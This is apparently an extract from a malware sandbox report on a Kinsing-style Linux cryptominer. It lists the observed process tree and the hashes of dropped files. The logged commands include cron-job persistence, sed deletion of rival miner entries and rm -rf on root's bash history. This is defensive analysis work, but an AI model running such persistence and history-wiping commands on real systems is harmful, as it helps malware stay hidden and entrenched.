                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /3.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /workers/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2627
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /oracleservice/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2630
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            grep -v grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep -e 185.191.32.198
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2634
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2633
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rm -rf /root/.bash_history
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    md5sum /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1877
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2379
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        md5sum /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2387
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            md5sum /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                md5sum /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2390
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    md5sum /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2407
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2437
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        md5sum /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2638

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/lib/systemd/system/bot.service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            193B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            a3e1220eacdbd3fa5d0117efd5d4dd91

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            b66492d74a517bcd9d230b574b56411476124709

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            05d02411668f4ebd576a24ac61cc84e617bdb66aa819581daa670c65f1a876f0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            78d27f45518a7fce636ef790ee215b1f47b2939e02cf6c5118897a703cc15ed4c283838d30a275e309304415d2a58e2e4a07d99127ec9ff32221d94e6547ca1f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/tmp.DXakxk

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            175B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            03b520f9f7d5359db4091efa74fbd296

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            9fb7a330704b2a9f88fdd34e65a601521bfaa702

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8b975b3f06046403879ace044e6ecb93a5d3db859b6e44d9447e20a4767af42f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8774e9c82bc10c0b4e1653b59bc2cadd6ad670bbeef3ec68e129067883b7a478ae535409e5b72c2fa2b56878215dfd4c09a4e2f9be852e080c11c24e82a62d27

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/tmp.OuaeaC

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            250B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4bb29aed61ab7499ae9176c37dc21be8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ec472f8bd96cc88eef20e2330f8a9aa602b3d0e9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            b77f8e33fe95d0137922a097fd56601f6959ff5161a5ce26edc16b5a17b2884f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            b8d822619671554228c78eb75a362bb8c05d5006cfb5febb839b3a39afe7f0d74869c55f76164666b21fffa93759f31083167de4edf0c4d41a653e2021583408

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/tmp.T1CvWV

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            175B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6fefea2be33243ddbb0f920a7fbf43dd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4906d2323cfeb660180eecdad779ffddb00197b1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            13842fdbfff303c36f71272f83cf061a75156df5e3d6a4aaae892438d675ecd7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ec81e82c13d8957be8df0a0e3097fb501453bf61519afef91eb657a885ec131edcddb0b545ddbf376a89895ae78177cf6405e60400d0427fb05bf77f1024f7ea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/tmp.kWCF4d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            175B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            904ff350df7eddf6071f0dab77af807b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6f6b08e23450a6a52db23f05a03d51c2d8d2779f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            52096ff4bd994d15ca784642a894ce45ebe2fc94100d0f16eefa746522dada99

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2de67c4cf76ec11a9a868f8537e55a62ecaca2fe37fa6f5e18720d459bc89edf1bfcc7c2299b5656aa6e30ba52cf712d8c7d064768ec2d124148ef358f5d356c